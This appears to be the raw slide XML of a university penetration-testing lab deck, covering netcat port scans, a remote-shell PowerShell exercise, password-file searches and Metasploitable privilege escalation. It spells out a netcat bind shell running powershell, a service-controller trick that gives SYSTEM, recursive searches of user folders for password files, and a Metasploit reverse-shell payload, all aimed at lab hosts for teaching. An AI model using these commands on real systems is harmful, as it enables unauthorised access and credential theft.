              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -n -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -z 10.10.0.5 %v</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>For a cleaner output, redirect stderr to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>2&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>, and now we can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>FOR /f %v IN (ports.txt) DO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -n –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -z 10.10.0.5 %v 2&gt;&amp;1 | find "[10.10"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/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529B4-1A83-E340-8C8B-82AE83349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296" y="901156"/>
            <a:ext cx="3440242" cy="621155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2CD71-F311-4B42-8CF3-1B686A5D0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65" y="1662954"/>
            <a:ext cx="1869920" cy="986225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37E55-2C07-724B-B2AF-F36D3F16E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592" y="3593625"/>
            <a:ext cx="6955436" cy="12974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2091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- Execute with sc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Now let's try executing a command using the service controller </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> of the remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Create a new service named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> for that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>hostname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> that starts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>8081</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start the service and, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng"/>
              <a:t>quickly in another window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, connect to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>who is the user of the netcat listener?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wait for a few more seconds. What happened? Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If you have to disconnect from SSH, you will need to add ncat to your path again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Or just call netcat from the full path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007672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5400"/>
              <a:t>Spoiler ahead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46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- Execute with sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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/>
              <a:t>We run the service and connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> says that we are system! Privilege escalation, check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>After 30 seconds, we get booted! Service controllers only wait 30 seconds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Without a "service successful" from the API, it kills the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5FE51-92D9-3C48-8B12-90C28DF2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90" y="2226041"/>
            <a:ext cx="8400819" cy="23043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7768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PowerShell Lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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498677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PowerShell fun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Let's try some PowerShell puzzles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Create a new netcat listener on your Windows machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Have it execute "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Connect with your Kali host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make a directory called 'temp' in your user directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C:\Users\IEUser\temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Create a text file with the string "user nyu6573 password P@$$word" called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NYUpassword.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Write a PowerShell command to search the C:\Users directory to find filed with "password" in the filename</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1419374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5400"/>
              <a:t>Spoiler ahead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75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PowerShell fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answers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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>On the Windows machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -l -p 8080 –e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" err="1">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>10.10.0.5 8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>mkdir temp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>echo "[string]" &gt; [file.txt]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>As for searching for files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There are several answers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Easy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>ls -r \Users *password*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We may get errors, access denied to folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hide those errors to clean up our output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>ls -r \Users *password* 2&gt;$null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can see on the next slide the difference</a:t>
            </a:r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05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PowerShell fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answers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41B76-3BC1-0B48-9ABF-0F9405D84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86" y="1063385"/>
            <a:ext cx="7427628" cy="35919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5238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85372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4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -r \Users *password*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7642" y="85372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4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -r \Users *password* 2&gt;$null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68CA89-2E62-4450-B09E-5765538EEA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PowerShell fun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answers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761F1-042D-3849-B679-C447787F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69" y="1458605"/>
            <a:ext cx="3973546" cy="12763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44238A-D280-7A43-97B2-DF38C63BE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32" y="1458605"/>
            <a:ext cx="4672827" cy="27383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447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30EAE-0F74-4F90-BA85-E50655208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Locate the exploit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26151-B530-46DD-AA57-E1027572DD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5579" y="794458"/>
            <a:ext cx="8762167" cy="395509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 sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>First, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> to find an exploit for Crossfire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> crossfire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Next, make a directory and copy of it so we're not messing with the original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Finally, cat the file and start walking through the source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Pay attention to payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 8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A55D30ED-EE13-48D2-8D01-673034EC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72" y="1313525"/>
            <a:ext cx="4573360" cy="931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10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A24ED93-C6CA-4C91-90E6-87E025AA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569" y="3299128"/>
            <a:ext cx="3565391" cy="1513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97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PowerShell file scraping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Try a similar thing but this time, search the contents of files for the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"nyu6573"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>redirect all stder to $null to keep the output clean</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2335575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5400"/>
              <a:t>Spoiler ahead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1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PowerShell file scraping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Answers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Try a similar thing but this time, search the contents of files for the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"nyu6573"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ls -r \users 2&gt;$null | % {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -path $_ -pattern nyu6573} 2&gt;$null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9BBDC-B09C-D146-9861-1A3D70537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86" y="2834248"/>
            <a:ext cx="7963828" cy="13875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6031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PowerShell Port Scan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Create a port scanner to scan ports 20-25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Scan target should be itself, 10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Again, there are better ways to determine open ports but this is just for the lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Print the port and then print if it is open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>stderr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Hint: we don't need to use for loops. PowerShell iterates through numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1..5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>use "%" as an alias for ForEach-Object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67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5400"/>
              <a:t>Spoiler ahead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3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PowerShell Port Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Answer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a port scanner to scan ports 20-25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan target should be itself, 10.10.0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PS C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>20..25 | % {echo "Port $_"; echo ((new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Net.Sockets.TcpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>).Connect("10.10.0.5",$_)) "OPEN" } 2&gt;$null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2724F-746A-9B4B-B1AA-0FA2C04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5" y="2865638"/>
            <a:ext cx="8882830" cy="1356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923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Privilege Escalation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Metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="105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0331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8FBA9-DD06-4B09-BF61-314AF1F138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Privilege Escalation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81B144-2FB6-40B2-B77C-CBDF419B89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This lab will review some Privilege Escalation (PE) attacks against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and an older version of Windows 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the first target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208109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A7522-7816-410E-9F40-E36028352A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Metasploitable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437343-6D12-4182-B9B6-06DF492235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Before we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> esc, we will first need a limited shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1"/>
              <a:t>distcc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A tool for setting up distributed compiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerable on Metasploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Listens on port 3000-something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Because it's Metasploitable, there's a metasploit module we can use!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Use payload: cmd/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>/reverse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Figure out which port it runs on and get a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Once you have a shell, get the kernel version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8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0743C-B808-47D3-9421-5BDF8BC191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DF11A3-B2E7-4854-9C7A-9D648E541C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6000"/>
              <a:t>SPOILER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384559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F5CB0-6DC4-4D40-BEF6-A20E77DE1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Source Code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023AE-2803-4E0F-963A-6F855010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5" y="1573300"/>
            <a:ext cx="5638121" cy="382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F8F42-7347-4AD2-B309-5C00756F6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00" y="764664"/>
            <a:ext cx="2785992" cy="1240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B442B-96D1-430D-931E-65E0D851F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26" y="2814310"/>
            <a:ext cx="4640604" cy="1179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EEBF9-8F5A-4845-8928-C568EC90D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383" y="2814310"/>
            <a:ext cx="4086225" cy="2232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1220F5-8A31-4FCA-B3B6-7D2316FFF921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3164361" y="3179818"/>
            <a:ext cx="1131176" cy="81371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AE0C80-EE54-48DE-AA3E-80A8D59F494C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054109" y="2487013"/>
            <a:ext cx="1182072" cy="916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79810-0483-44D6-AB8F-AE5D9E455B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5062717" y="2470690"/>
            <a:ext cx="2705707" cy="1687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4E8AC-F0BB-4CC0-9098-8CF958C02B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779" y="764541"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
